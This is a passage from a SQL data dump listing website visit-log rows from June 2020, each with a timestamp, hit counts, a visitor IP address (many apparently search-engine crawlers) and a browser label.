0,0,'77.120.98.235','other'),(511833,1591584312,1,1,0,0,'157.55.39.221','other'),(511834,1591584516,1,1,0,0,'194.61.24.94','other'),(511835,1591585148,1,1,0,0,'66.249.65.130','chrome'),(511836,1591585599,1,1,0,0,'66.249.65.132','chrome'),(511837,1591585680,8,8,0,0,'77.120.98.235','other'),(511838,1591585749,1,1,0,0,'66.249.73.168','chrome'),(511839,1591586549,1,1,0,0,'157.55.39.191','other'),(511840,1591587274,3,3,0,0,'66.249.73.166','chrome'),(511841,1591587415,1,1,0,0,'157.55.39.52','other'),(511842,1591587634,1,1,0,0,'3.120.225.253','other'),(511843,1591587816,8,8,0,0,'77.120.98.235','other'),(511844,1591587916,1,0,1,0,'66.249.73.165',''),(511845,1591588403,1,1,0,0,'8.29.198.25','other'),(511846,1591588424,1,1,0,0,'8.29.198.27','other'),(511847,1591588858,1,1,0,0,'66.249.73.166','chrome'),(511848,1591589339,1,1,0,0,'157.55.39.52','other'),(511849,1591589979,8,8,0,0,'77.120.98.235','other'),(511850,1591591153,1,1,0,0,'51.77.52.160','chrome'),(511851,1591592087,3,3,0,0,'66.249.73.165','chrome'),(511852,1591592151,1,1,0,0,'62.205.134.182','other'),(511853,1591592189,8,8,0,0,'77.120.98.235','other'),(511854,1591592488,1,1,0,0,'66.249.73.168','chrome'),(511855,1591594092,1,1,0,0,'157.55.39.52','other'),(511856,1591594465,8,8,0,0,'77.120.98.235','other'),(511857,1591594534,1,1,0,0,'66.249.73.168','chrome'),(511858,1591594686,1,1,0,0,'157.55.39.191','other'),(511859,1591595005,1,1,0,0,'18.27.197.252','other'),(511860,1591595647,1,1,0,0,'66.249.73.166','chrome'),(511861,1591596767,8,8,0,0,'77.120.98.235','other'),(511862,1591597599,1,1,0,0,'157.55.39.52','other'),(511863,1591597923,1,1,0,0,'66.249.73.165','chrome'),(511864,1591598104,1,1,0,0,'66.249.73.168','chrome'),(511865,1591599058,8,8,0,0,'77.120.98.235','other'),(511866,1591599227,2,2,0,0,'8.29.198.26','other'),(511867,1591599645,1,1,0,0,'213.180.203.17','other'),(511868,1591599889,1,1,0,0,'66.249.73.165','chrome'),(511869,1591600235,1,1,0,0,'91.196.178.33','chrome'),(511870,1591600350,1,1,0,0,'66.249.73.168','chrome'),(511871,1591601344,8,8,0,0,'77.120.98.235','other'),(511872,1591601729,1,1,0,0,'131.220.6.152','chrome'),(511873,1591601979,1,1,0,0,'17.58.99.84','other'),(511874,1591602225,1,1,0,0,'66.249.73.168','chrome'),(511875,1591603241,1,1,0,0,'207.46.13.187','other'),(511876,1591603427,1,1,0,0,'157.55.39.52','other'),(511877,1591603452,1,1,0,0,'157.55.39.191','other'),(511878,1591603643,1,0,1,0,'66.249.73.165',''),(511879,1591603657,8,8,0,0,'77.120.98.235','other'),(511880,1591604370,1,1,0,0,'157.55.39.191','other'),(511881,1591605766,1,1,0,0,'213.180.203.122','other'),(511882,1591606012,8,8,0,0,'77.120.98.235','other'),(511883,1591606851,1,1,0,0,'207.46.13.187','other'),(511884,1591608314,8,8,0,0,'77.120.98.235','other'),(511885,1591608460,1,1,0,0,'18.216.36.62','chrome'),(511886,1591609014,1,1,0,0,'66.249.73.166','chrome'),(511887,1591610056,1,1,0,0,'8.29.198.25','other'),(511888,1591610084,1,1,0,0,'8.29.198.26','other'),(511889,1591610137,1,1,0,0,'178.154.200.222','other'),(511890,1591610529,1,1,0,0,'207.46.13.187','other'),(511891,1591610701,1,1,0,0,'157.55.39.52','other'),(511892,1591610709,8,8,0,0,'77.120.98.235','other'),(511893,1591612020,1,1,0,0,'66.249.73.166','chrome'),(511894,1591612778,2,2,0,0,'66.249.73.168','chrome'),(511895,1591613154,8,8,0,0,'77.120.98.235','other'),(511896,1591613286,1,1,0,0,'66.249.73.166','chrome'),(511897,1591613922,1,1,0,0,'157.55.39.191','other'),(511898,1591614102,1,1,0,0,'66.249.73.168','chrome'),(511899,1591614205,1,1,0,0,'23.94.206.120','chrome'),(511900,1591614213,1,1,0,0,'185.226.145.253','chrome'),(511901,1591615111,1,1,0,0,'109.74.154.72','chrome'),(511902,1591615341,2,2,0,0,'157.55.39.52','other'),(511903,1591615587,8,8,0,0,'77.120.98.235','other'),(511904,1591615995,1,1,0,0,'66.249.73.165','chrome'),(511905,1591616130,1,1,0,0,'157.55.39.191','other'),(511906,1591616390,1,1,0,0,'157.55.39.52','other'),(511907,1591616689,1,1,0,0,'17.58.99.84','other'),(511908,1591617013,2,2,0,0,'207.46.13.187','other'),(511909,1591617364,1,1,0,0,'45.55.58.166','other'),(511910,1591617687,3,3,0,0,'66.249.73.166','chrome'),(511911,1591618006,1,1,0,0,'66.249.73.165','chrome'),(511912,1591618026,8,8,0,0,'77.120.98.235','other'),(511913,1591618262,1,1,0,0,'157.55.39.191','other'),(511914,1591618554,1,1,0,0,'157.55.39.52','other'),(511915,1591619035,1,1,0,0,'207.46.13.187','other'),(511916,1591619124,2,2,0,0,'66.249.73.165','chrome'),(511917,1591619328,1,1,0,0,'91.196.178.41','chrome'),(511918,1591619717,1,1,0,0,'17.58.99.84','other'),(511919,1591619898,2,2,0,0,'66.249.73.166','chrome'),(511920,1591620026,1,1,0,0,'178.154.200.222','other'),(511921,1591620240,3,3,0,0,'207.46.13.167','other'),(511922,1591620266,1,1,0,0,'157.55.39.52','other'),(511923,1591620514,8,8,0,0,'77.120.98.235','other'),(511924,1591620886,1,1,0,0,'8.29.198.25','other'),(511925,1591620919,1,1,0,0,'8.29.198.27','other'),(511926,1591620928,2,2,0,0,'66.249.73.168','chrome'),(511927,1591621226,1,1,0,0,'157.55.39.191','other'),(511928,1591621697,1,1,0,0,'66.249.65.132','chrome'),(511929,1591622714,1,1,0,0,'66.249.73.166','chrome'),(511930,1591623020,8,8,0,0,'77.120.98.235','other'),(511931,1591623349,2,2,0,0,'54.149.219.200','chrome'),(511932,1591624122,1,1,0,0,'207.46.13.167','other'),(511933,1591624175,1,1,0,0,'66.249.73.165','chrome'),(511934,1591624648,2,2,0,0,'66.249.73.166','chrome'),(511935,1591624806,1,1,0,0,'17.58.99.84','other'),(511936,1591625174,1,1,0,0,'66.249.73.168','chrome'),(511937,1591625506,1,1,0,0,'157.55.39.52','other'),(511938,1591625687,8,8,0,0,'77.120.98.235','other'),(511939,1591626050,1,1,0,0,'66.249.73.165','chrome'),(511940,1591626541,1,1,0,0,'66.249.73.168','chrome'),(511941,1591627802,1,1,0,0,'66.249.65.132','chrome'),(511942,1591628445,3,3,0,0,'66.249.73.168','chrome'),(511943,1591628475,1,1,0,0,'66.249.73.165','chrome'),(511944,1591628515,8,8,0,0,'77.120.98.235','other'),(511945,1591628565,1,1,0,0,'54.36.149.5','other'),(511946,1591629468,1,1,0,0,'66.249.65.128','chrome'),(511947,1591629800,1,1,0,0,'66.249.65.132','chrome'),(511948,1591630096,1,1,0,0,'66.249.73.166','chrome'),(511949,1591630444,1,1,0,0,'66.249.73.174','chrome'),(511950,1591630723,1,1,0,0,'66.249.73.165','chrome'),(511951,1591631027,3,3,0,0,'207.46.13.187','other'),(511952,1591631438,2,2,0,0,'66.249.65.132','chrome'),(511953,1591631515,1,1,0,0,'66.249.73.166','chrome'),(511954,1591631529,8,8,0,0,'77.120.98.235','other'),(511955,1591631645,1,1,0,0,'157.55.39.191','other'),(511956,1591631692,3,3,0,0,'66.249.73.165','chrome'),(511957,1591631715,2,2,0,0,'8.29.198.27','other'),(511958,1591632000,2,2,0,0,'66.249.73.168','chrome'),(511959,1591632006,1,1,0,0,'66.249.65.130','chrome'),(511960,1591632381,1,1,0,0,'91.196.178.33','chrome'),(511961,1591632674,1,1,0,0,'66.249.73.165','chrome'),(511962,1591633514,3,3,0,0,'66.249.73.168','chrome'),(511963,1591633833,2,2,0,0,'66.249.73.165','chrome'),(511964,1591634082,1,1,0,0,'66.249.73.166','chrome'),(511965,1591634942,8,8,0,0,'77.120.98.235','other'),(511966,1591635168,1,1,0,0,'17.58.99.84','other'),(511967,1591635374,4,4,0,0,'66.249.73.166','chrome'),(511968,1591635524,2,2,0,0,'66.249.73.165','chrome'),(511969,1591635545,1,1,0,0,'207.46.13.167','other'),(511970,1591637010,3,3,0,0,'66.249.73.165','chrome'),(511971,1591637901,1,1,0,0,'207.46.13.167','other'),(511972,1591637956,1,1,0,0,'66.249.73.166','chrome'),(511973,1591638252,1,1,0,0,'66.249.65.128','chrome'),(511974,1591638488,2,2,0,0,'66.249.73.168','chrome'),(511975,1591638837,1,1,0,0,'66.249.65.130','chrome'),(511976,1591639016,8,8,0,0,'77.120.98.235','other'),(511977,1591639156,2,2,0,0,'66.249.73.166','chrome'),(511978,1591640221,2,2,0,0,'66.249.73.165','chrome'),(511979,1591641020,2,2,0,0,'66.249.73.168','chrome'),(511980,1591641229,1,1,0,0,'213.180.203.95','other'),(511981,1591641505,2,2,0,0,'66.249.73.166','chrome'),(511982,1591641859,1,1,0,0,'91.196.178.162','chrome'),(511983,1591641990,1,1,0,0,'66.249.73.168','chrome'),(511984,1591642503,1,1,0,0,'207.46.13.167','other'),(511985,1591642543,2,2,0,0,'8.29.198.25','other'),(511986,1591643273,1,1,0,0,'66.249.73.166','chrome'),(511987,1591643403,2,2,0,0,'66.249.73.165','chrome'),(511988,1591643817,1,1,0,0,'157.55.39.52','other'),(511989,1591644066,2,2,0,0,'66.249.65.132','chrome'),(511990,1591644255,1,1,0,0,'66.249.73.168','chrome'),(511991,1591644334,8,8,0,0,'77.120.98.235','other'),(511992,1591645249,1,1,0,0,'207.46.13.167','other'),(511993,1591645834,3,3,0,0,'66.249.73.165','chrome'),(511994,1591645958,3,3,0,0,'66.249.73.166','chrome'),(511995,1591646101,1,1,0,0,'66.249.65.128','chrome'),(511996,1591646117,1,1,0,0,'157.55.39.191','other'),(511997,1591646319,2,1,1,0,'66.249.73.168',''),(511998,1591646868,1,1,0,0,'51.83.200.173','firefox'),(511999,1591646934,1,1,0,0,'66.249.73.165','chrome'),(512000,1591647101,1,1,0,0,'207.46.13.187','other'),(512001,1591647351,1,1,0,0,'157.55.39.52','other'),(512002,1591647787,1,1,0,0,'157.55.39.191','other'),(512003,1591648058,1,1,0,0,'66.249.70.70','chrome'),(512004,1591648393,1,1,0,0,'207.46.13.187','other'),(512005,1591648530,1,1,0,0,'178.93.107.248','chrome'),(512006,1591648601,2,2,0,0,'95.213.141.126','opera'),(512007,1591648644,1,1,0,0,'91.218.15.61','chrome'),(512008,1591649507,2,2,0,0,'66.249.70.70','chrome'),(512009,1591650845,1,1,0,0,'66.249.64.33','chrome'),(512010,1591650885,3,3,0,0,'66.249.70.70','chrome'),(512011,1591651068,1,1,0,0,'66.249.70.69','chrome'),(512012,1591651369,1,1,0,0,'66.249.70.72','chrome'),(512013,1591651523,1,1,0,0,'157.55.39.52','other'),(512014,1591651607,8,8,0,0,'77.120.98.235','other'),(512015,1591651924,1,1,0,0,'66.249.64.36','chrome'),(512016,1591652309,1,1,0,0,'66.249.70.70','chrome'),(512017,1591652498,1,1,0,0,'207.46.13.167','other'),(512018,1591652599,1,1,0,0,'66.249.70.72','chrome'),(512019,1591652634,3,3,0,0,'66.249.70.69','chrome'),(512020,1591652669,1,1,0,0,'17.58.99.84','other'),(512021,1591653374,1,1,0,0,'8.29.198.25','other'),(512022,1591653385,1,1,0,0,'5.44.169.215','chrome'),(512023,1591653407,1,1,0,0,'8.29.198.26','other'),(512024,1591654052,2,2,0,0,'66.249.70.69','chrome'),(512025,1591654863,2,2,0,0,'66.249.64.33','chrome'),(512026,1591655259,1,0,1,0,'66.249.70.72',''),(512027,1591655381,1,1,0,0,'66.249.70.70','chrome'),(512028,1591655727,1,1,0,0,'66.249.64.38','chrome'),(512029,1591655868,1,1,0,0,'66.249.64.36','chrome'),(512030,1591656004,1,1,0,0,'66.249.70.72','chrome'),(512031,1591656086,1,1,0,0,'157.55.39.191','other'),(512032,1591656345,1,1,0,0,'194.61.24.102','chrome'),(512033,1591657059,1,1,0,0,'178.154.200.222','other'),(512034,1591657237,1,1,0,0,'207.46.13.187','other'),(512035,1591657926,3,3,0,0,'66.249.70.69','chrome'),(512036,1591658158,1,1,0,0,'157.55.39.191','other'),(512037,1591659014,1,1,0,0,'66.249.64.38','chrome'),(512038,1591659181,2,2,0,0,'207.46.13.167','other'),(512039,1591659529,1,1,0,0,'66.249.70.70','chrome'),(512040,1591659745,1,1,0,0,'157.55.39.52','other'),(512041,1591660422,2,2,0,0,'91.196.178.1','chrome'),(512042,1591660440,3,3,0,0,'66.249.70.72','chrome'),(512043,1591660506,1,1,0,0,'62.205.134.182','other'),(512044,1591660753,1,1,0,0,'66.249.70.69','chrome'),(512045,1591661113,8,8,0,0,'77.120.98.235','other'),(512046,1591661326,1,1,0,0,'178.154.200.131','other'),(512047,1591662070,1,1,0,0,'207.46.13.167','other'),(512048,1591662502,1,1,0,0,'157.55.39.191','other'),(512049,1591662890,1,1,0,0,'157.55.39.52','other'),(512050,1591663113,1,1,0,0,'66.249.70.72','chrome'),(512051,1591663895,1,1,0,0,'66.249.64.38','chrome'),(512052,1591664208,1,1,0,0,'8.29.198.26','other'),(512053,1591664242,1,1,0,0,'8.29.198.25','other'),(512054,1591664713,2,2,0,0,'66.249.70.69','chrome'),(512055,1591665471,2,2,0,0,'66.249.64.36','chrome'),(512056,1591665649,1,1,0,0,'194.61.24.94','other'),(512057,1591665928,3,3,0,0,'66.249.70.69','chrome'),(512058,1591666061,2,2,0,0,'66.249.70.70','chrome'),(512059,1591666570,1,1,0,0,'66.249.64.36','chrome'),(512060,1591666877,1,1,0,0,'66.249.70.69','chrome'),(512061,1591667681,2,2,0,0,'157.55.39.52','other'),(512062,1591667693,2,2,0,0,'66.249.70.72','chrome'),(512063,1591668481,3,3,0,0,'66.249.70.69','chrome'),(512064,1591668759,1,1,0,0,'157.55.39.52','other'),(512065,1591668912,2,2,0,0,'66.249.64.38','chrome'),(512066,1591669118,1,1,0,0,'45.86.201.196','chrome'),(512067,1591669243,4,4,0,0,'66.249.70.70','chrome'),(512068,1591669337,1,1,0,0,'66.249.70.72','chrome'),(512069,1591669907,1,1,0,0,'17.58.99.84','other'),(512070,1591669952,1,1,0,0,'66.249.70.69','chrome'),(512071,1591670135,1,1,0,0,'5.44.169.215','chrome'),(512072,1591670421,1,0,1,0,'66.249.70.72',''),(512073,1591670457,1,1,0,0,'66.249.64.38','chrome'),(512074,1591670515,1,1,0,0,'178.154.200.92','other'),(512075,1591670825,2,2,0,0,'157.55.39.52','other'),(512076,1591671430,8,8,0,0,'77.120.98.235','other'),(512077,1591671433,3,3,0,0,'66.249.70.69','chrome'),(512078,1591671675,1,1,0,0,'45.86.201.196','chrome'),(512079,1591672421,1,1,0,0,'66.249.70.72','chrome'),(512080,1591673310,1,1,0,0,'213.180.203.109','other'),(512081,1591673611,1,1,0,0,'209.17.97.10','other'),(512082,1591673664,1,1,0,0,'66.249.70.69','chrome'),(512083,1591673740,9,9,0,0,'94.130.9.183','other'),(512084,1591674273,1,1,0,0,'207.46.13.167','other'),(512085,1591674645,5,5,0,0,'94.130.9.183','other'),(512086,1591674869,1,1,0,0,'66.249.64.36','chrome'),(512087,1591675044,2,2,0,0,'8.29.198.25','other'),(512088,1591675225,1,1,0,0,'17.58.99.84','other'),(512089,1591676333,1,1,0,0,'157.55.39.191','other'),(512090,1591676819,2,2,0,0,'66.249.70.72','chrome'),(512091,1591677260,1,1,0,0,'66.249.70.70','chrome'),(512092,1591678077,1,1,0,0,'66.249.64.36','chrome'),(512093,1591678338,1,1,0,0,'62.205.134.182','other'),(512094,1591680827,1,1,0,0,'66.249.70.69','chrome'),(512095,1591681404,4,4,0,0,'69.197.177.50','other'),(512096,1591682056,1,1,0,0,'209.17.97.10','other'),(512097,1591682116,1,1,0,0,'195.211.175.163','chrome'),(512098,1591682270,1,1,0,0,'213.180.203.148','other'),(512099,1591682425,1,1,0,0,'66.249.70.70','chrome'),(512100,1591682541,1,1,0,0,'213.180.203.109','chrome'),(512101,1591682926,2,2,0,0,'66.249.64.38','chrome'),(512102,1591683419,1,1,0,0,'66.249.70.72','chrome'),(512103,1591684095,2,2,0,0,'66.249.70.69','chrome'),(512104,1591684154,1,1,0,0,'157.55.39.191','other'),(512105,1591684471,1,1,0,0,'66.249.64.36','chrome'),(512106,1591685187,2,2,0,0,'207.46.13.167','other'),(512107,1591685880,2,2,0,0,'8.29.198.27','other'),(512108,1591686176,2,2,0,0,'66.249.70.69','chrome'),(512109,1591686830,1,1,0,0,'91.196.178.86','chrome'),(512110,1591686906,1,1,0,0,'66.249.70.72','chrome'),(512111,1591687540,1,1,0,0,'157.55.39.52','other'),(512112,1591687579,1,1,0,0,'66.249.70.70','chrome'),(512113,1591688096,1,1,0,0,'213.180.203.17','other'),(512114,1591688161,1,1,0,0,'131.220.6.152','chrome'),(512115,1591688505,1,1,0,0,'66.249.70.69','chrome'),(512116,1591688582,1,1,0,0,'91.196.179.134','chrome'),(512117,1591688783,1,1,0,0,'66.249.70.70','chrome'),(512118,1591688922,8,8,0,0,'77.120.98.235','other'),(512119,1591689186,1,1,0,0,'157.55.39.52','other'),(512120,1591689194,1,1,0,0,'157.55.39.191','other'),(512121,1591689235,2,2,0,0,'66.249.70.72','chrome'),(512122,1591689838,1,1,0,0,'95.132.8.92','chrome'),(512123,1591690492,2,2,0,0,'66.249.70.69','chrome'),(512124,1591690833,1,1,0,0,'66.249.70.70','chrome'),(512125,1591691350,1,1,0,0,'213.180.203.17','other'),(512126,1591691554,1,1,0,0,'157.55.39.52','other'),(512127,1591691593,1,1,0,0,'66.249.70.69','chrome'),(512128,1591692375,1,1,0,0,'91.196.178.181','chrome'),(512129,1591692576,2,2,0,0,'66.249.70.69','chrome'),(512130,1591692582,1,1,0,0,'66.249.70.70','chrome'),(512131,1591692601,1,1,0,0,'95.217.201.38','other'),(512132,1591694430,1,1,0,0,'157.55.39.52','other'),(512133,1591694780,1,1,0,0,'17.58.99.84','other'),(512134,1591696715,1,1,0,0,'8.29.198.27','other'),(512135,1591696734,1,1,0,0,'8.29.198.26','other'),(512136,1591697777,1,1,0,0,'66.249.70.72','chrome'),(512137,1591697813,1,1,0,0,'3.230.148.221','chrome'),(512138,1591698022,2,2,0,0,'66.249.70.70','chrome'),(512139,1591698227,2,2,0,0,'17.58.99.84','other'),(512140,1591699083,1,1,0,0,'94.178.163.113','firefox'),(512141,1591699584,1,1,0,0,'91.196.178.176','chrome'),(512142,1591700018,1,1,0,0,'66.249.70.72','chrome'),(512143,1591701139,1,1,0,0,'66.249.70.72','chrome'),(512144,1591701310,1,1,0,0,'66.249.64.36','chrome'),(512145,1591701402,1,1,0,0,'66.249.70.70','chrome'),(512146,1591701529,1,1,0,0,'109.74.154.72','chrome'),(512147,1591701620,1,1,0,0,'62.80.168.254','chrome'),(512148,1591701696,2,2,0,0,'207.46.13.167','other'),(512149,1591701823,2,2,0,0,'66.249.70.69','chrome'),(512150,1591701896,1,1,0,0,'157.55.39.52','other'),(512151,1591703020,1,1,0,0,'37.53.123.219','chrome'),(512152,1591703705,1,0,1,0,'66.249.70.72',''),(512153,1591704042,1,1,0,0,'185.151.84.147','chrome'),(512154,1591704055,2,2,0,0,'66.249.70.69','chrome'),(512155,1591704866,2,2,0,0,'66.249.70.70','chrome'),(512156,1591704871,1,1,0,0,'66.249.64.33','chrome'),(512157,1591705917,1,1,0,0,'62.80.168.254','chrome'),(512158,1591706039,1,1,0,0,'157.55.39.52','other'),(512159,1591706058,3,3,0,0,'66.249.70.69','chrome'),(512160,1591706119,1,1,0,0,'95.134.141.100','firefox'),(512161,1591706210,1,1,0,0,'91.196.178.173','chrome'),(512162,1591706315,1,1,0,0,'37.73.97.29','chrome'),(512163,1591706576,1,1,0,0,'95.67.72.70','chrome'),(512164,1591706875,1,1,0,0,'66.249.70.70','chrome'),(512165,1591706904,1,1,0,0,'66.249.64.36','chrome'),(512166,1591707058,2,2,0,0,'66.249.70.69','chrome'),(512167,1591707088,1,1,0,0,'91.196.178.71','chrome'),(512168,1591707551,1,1,0,0,'8.29.198.27','other'),(512169,1591707562,1,1,0,0,'8.29.198.25','other'),(512170,1591707736,1,1,0,0,'178.154.200.216','other'),(512171,1591707749,1,1,0,0,'95.216.96.170','other'),(512172,1591707987,1,1,0,0,'66.249.70.72','chrome'),(512173,1591709639,1,1,0,0,'95.216.96.170','other'),(512174,1591709667,1,1,0,0,'157.55.39.191','other'),(512175,1591709793,1,1,0,0,'66.249.70.70','chrome'),(512176,1591709873,1,1,0,0,'66.249.64.36','chrome'),(512177,1591710138,1,1,0,0,'157.55.39.52','other'),(512178,1591710610,1,1,0,0,'95.216.96.170','other'),(512179,1591710828,1,1,0,0,'66.249.64.38','chrome'),(512180,1591710999,1,1,0,0,'157.55.39.191','other'),(512181,1591711355,1,1,0,0,'66.249.64.36','chrome'),(512182,1591711549,2,2,0,0,'66.249.70.69','chrome'),(512183,1591712206,3,3,0,0,'66.249.70.70','chrome'),(512184,1591712833,3,3,0,0,'66.249.70.69','chrome'),(512185,1591712899,1,1,0,0,'66.249.70.72','chrome'),(512186,1591713218,1,1,0,0,'66.249.64.36','chrome'),(512187,1591713548,1,1,0,0,'66.249.64.38','chrome'),(512188,1591713583,1,1,0,0,'17.58.99.84','other'),(512189,1591713585,1,1,0,0,'91.167.241.206','firefox'),(512190,1591714423,1,1,0,0,'213.180.203.70','other'),(512191,1591714704,4,4,0,0,'66.249.70.70','chrome'),(512192,1591714740,1,1,0,0,'66.249.64.36','chrome'),(512193,1591714977,1,1,0,0,'66.249.70.72','chrome'),(512194,1591716189,1,1,0,0,'66.249.70.69','chrome'),(512195,1591716524,1,1,0,0,'66.249.64.36','chrome'),(512196,1591716542,3,3,0,0,'66.249.70.70','chrome'),(512197,1591717071,1,1,0,0,'178.154.200.220','other'),(512198,1591717747,1,1,0,0,'91.196.178.88','firefox'),(512199,1591718068,2,2,0,0,'66.249.70.70','chrome'),(512200,1591718170,2,2,0,0,'66.249.70.72','chrome'),(512201,1591718174,1,1,0,0,'66.249.70.69','chrome'),(512202,1591718385,2,2,0,0,'8.29.198.26','other'),(512203,1591718448,3,3,0,0,'207.46.13.167','other'),(512204,1591718648,1,1,0,0,'66.249.64.38','chrome'),(512205,1591718758,1,1,0,0,'62.210.78.76','other'),(512206,1591719464,2,2,0,0,'66.249.70.72','chrome'),(512207,1591719617,1,1,0,0,'66.249.64.38','chrome'),(512208,1591719884,1,1,0,0,'207.46.13.167','other'),(512209,1591720237,1,1,0,0,'66.249.70.69','chrome'),(512210,1591720285,1,1,0,0,'66.249.64.33','chrome'),(512211,1591720703,8,8,0,0,'77.120.98.235','other'),(512212,1591720785,2,2,0,0,'66.249.70.70','chrome'),(512213,1591721157,1,1,0,0,'157.55.39.191','other'),(512214,1591721207,2,2,0,0,'66.249.70.72','chrome'),(512215,1591721319,2,2,0,0,'157.55.39.52','other'),(512216,1591721642,1,1,0,0,'31.173.25.208','chrome'),(512217,1591722458,1,1,0,0,'207.46.13.167','other'),(512218,1591722633,2,2,0,0,'66.249.70.72','chrome'),(512219,1591722709,1,1,0,0,'66.249.64.36','chrome'),(512220,1591722899,1,1,0,0,'66.249.64.38','chrome'),(512221,1591723484,1,1,0,0,'66.249.70.69','chrome'),(512222,1591723812,1,1,0,0,'157.55.39.52','other'),(512223,1591723969,2,2,0,0,'66.249.70.70','chrome'),(512224,1591724360,1,1,0,0,'157.55.39.191','other'),(512225,1591724459,1,1,0,0,'66.249.70.69','chrome'),(512226,1591724655,1,1,0,0,'17.58.99.84','other'),(512227,1591725675,2,2,0,0,'66.249.64.38','chrome'),(512228,1591726015,1,1,0,0,'66.249.70.70','chrome'),(512229,1591726166,1,1,0,0,'66.249.70.69','chrome'),(512230,1591726313,1,1,0,0,'66.249.70.72','chrome'),(512231,1591727279,1,1,0,0,'157.55.39.191','other'),(512232,1591727552,1,1,0,0,'66.249.70.70','chrome'),(512233,1591728088,1,1,0,0,'66.249.70.69','chrome'),(512234,1591728343,1,1,0,0,'157.55.39.191','other'),(512235,1591728423,1,1,0,0,'66.249.64.33','chrome'),(512236,1591728537,2,2,0,0,'66.249.70.70','chrome'),(512237,1591728648,1,1,0,0,'157.55.39.52','other'),(512238,1591729096,2,2,0,0,'66.249.70.72','chrome'),(512239,1591729220,2,2,0,0,'8.29.198.27','other'),(512240,1591729247,1,1,0,0,'78.106.122.233','chrome'),(512241,1591729322,1,1,0,0,'64.202.185.147','firefox'),(512242,1591729454,1,1,0,0,'104.203.102.231','chrome'),(512243,1591729463,1,1,0,0,'23.250.43.188','chrome'),(512244,1591729723,2,2,0,0,'66.249.70.69','chrome'),(512245,1591729846,3,3,0,0,'66.249.70.70','chrome'),(512246,1591729979,2,2,0,0,'207.46.13.167','other'),(512247,1591730016,1,1,0,0,'157.55.39.191','other'),(512248,1591730226,2,2,0,0,'66.249.70.72','chrome'),(512249,1591730508,1,1,0,0,'157.55.39.52','other'),(512250,1591730919,1,1,0,0,'66.249.70.70','chrome'),(512251,1591731371,2,2,0,0,'157.55.39.191','other'),(512252,1591731842,1,1,0,0,'66.249.70.72','chrome'),(512253,1591732140,1,1,0,0,'157.55.39.52','other'),(512254,1591732478,3,3,0,0,'66.249.64.36','chrome'),(512255,1591732579,1,1,0,0,'66.249.70.69','chrome'),(512256,1591733653,2,2,0,0,'157.55.39.191','other'),(512257,1591734015,1,1,0,0,'66.249.70.69','chrome'),(512258,1591734156,2,2,0,0,'66.249.70.70','chrome'),(512259,1591734666,1,1,0,0,'66.249.64.36','chrome'),(512260,1591735069,1,1,0,0,'157.55.39.191','other'),(512261,1591735243,1,1,0,0,'183.136.225.46','firefox'),(512262,1591735636,1,1,0,0,'66.249.70.72','chrome'),(512263,1591735932,1,1,0,0,'207.46.13.167','other'),(512264,1591736097,1,1,0,0,'66.249.70.70','chrome'),(512265,1591736175,1,1,0,0,'66.249.70.69','chrome'),(512266,1591736800,1,1,0,0,'37.73.165.196','chrome'),(512267,1591737089,2,2,0,0,'66.249.70.72','chrome'),(512268,1591737848,1,1,0,0,'66.249.70.69','chrome'),(512269,1591738816,2,2,0,0,'66.249.70.72','chrome'),(512270,1591738958,1,1,0,0,'207.46.13.167','other'),(512271,1591738998,1,1,0,0,'157.55.39.191','other'),(512272,1591740050,1,1,0,0,'8.29.198.25','other'),(512273,1591740051,1,1,0,0,'8.29.198.27','other'),(512274,1591740459,1,1,0,0,'66.249.70.72','chrome'),(512275,1591740466,2,2,0,0,'66.249.70.69','chrome'),(512276,1591740579,1,1,0,0,'66.249.70.70','chrome'),(512277,1591741530,1,1,0,0,'66.249.64.36','chrome'),(512278,1591741585,2,2,0,0,'66.249.70.70','chrome'),(512279,1591741702,4,4,0,0,'66.249.70.72','chrome'),(512280,1591742183,1,1,0,0,'157.55.39.191','other'),(512281,1591742457,1,1,0,0,'207.46.13.167','other'),(512282,1591742804,1,1,0,0,'47.108.80.103','other'),(512283,1591743595,1,1,0,0,'66.249.70.69','chrome'),(512284,1591743603,1,1,0,0,'66.249.70.72','chrome'),(512285,1591743944,1,1,0,0,'66.249.70.70','chrome'),(512286,1591744941,1,1,0,0,'66.249.70.69','chrome'),(512287,1591746108,1,1,0,0,'66.249.70.69','chrome'),(512288,1591746906,1,1,0,0,'62.205.134.182','other'),(512289,1591747192,1,1,0,0,'194.61.24.94','other'),(512290,1591747568,1,1,0,0,'66.249.64.36','chrome'),(512291,1591748162,1,1,0,0,'66.249.64.33','chrome'),(512292,1591748495,2,2,0,0,'66.249.70.69','chrome'),(512293,1591748759,1,1,0,0,'66.249.70.70','chrome'),(512294,1591748958,8,8,0,0,'77.120.98.235','other'),(512295,1591748970,1,1,0,0,'66.249.70.72','chrome'),(512296,1591749827,1,1,0,0,'192.99.4.63','chrome'),(512297,1591750805,2,2,0,0,'66.249.70.72','chrome'),(512298,1591750874,1,1,0,0,'8.29.198.25','other'),(512299,1591750888,1,1,0,0,'8.29.198.26','other'),(512300,1591751176,1,1,0,0,'66.249.70.70','chrome'),(512301,1591751317,1,1,0,0,'66.249.64.36','chrome'),(512302,1591752444,1,1,0,0,'157.55.39.52','other'),(512303,1591752487,1,1,0,0,'66.249.70.72','chrome'),(512304,1591753213,2,2,0,0,'66.249.64.36','chrome'),(512305,1591753718,3,3,0,0,'66.249.70.69','chrome'),(512306,1591754267,1,1,0,0,'66.249.64.38','chrome'),(512307,1591754929,1,1,0,0,'66.249.64.36','chrome'),(512308,1591755364,2,2,0,0,'66.249.70.69','chrome'),(512309,1591755863,1,1,0,0,'66.249.70.72','chrome'),(512310,1591755892,1,1,0,0,'157.55.39.52','other'),(512311,1591757126,1,0,1,0,'66.249.70.70',''),(512312,1591757594,1,1,0,0,'66.249.70.72','chrome'),(512313,1591758106,1,1,0,0,'66.249.70.69','chrome'),(512314,1591758557,1,1,0,0,'66.249.70.72','chrome'),(512315,1591758724,1,1,0,0,'66.249.70.70','chrome'),(512316,1591758931,1,1,0,0,'66.249.64.38','chrome'),(512317,1591759116,3,3,0,0,'66.249.70.69','chrome'),(512318,1591759645,1,1,0,0,'62.210.78.76','other'),(512319,1591760727,1,1,0,0,'66.249.70.70','chrome'),(512320,1591760763,2,2,0,0,'66.249.70.72','chrome'),(512321,1591761126,1,1,0,0,'66.249.70.69','chrome'),(512322,1591761371,1,1,0,0,'91.209.11.236','other'),(512323,1591761539,1,1,0,0,'178.154.200.196','other'),(512324,1591761707,2,2,0,0,'8.29.198.26','other'),(512325,1591762195,1,1,0,0,'66.249.70.72','chrome'),(512326,1591763932,1,1,0,0,'66.249.64.38','chrome'),(512327,1591764557,1,1,0,0,'62.205.134.182','other'),(512328,1591764710,1,1,0,0,'66.249.64.36','chrome'),(512329,1591764896,1,1,0,0,'157.55.39.157','other'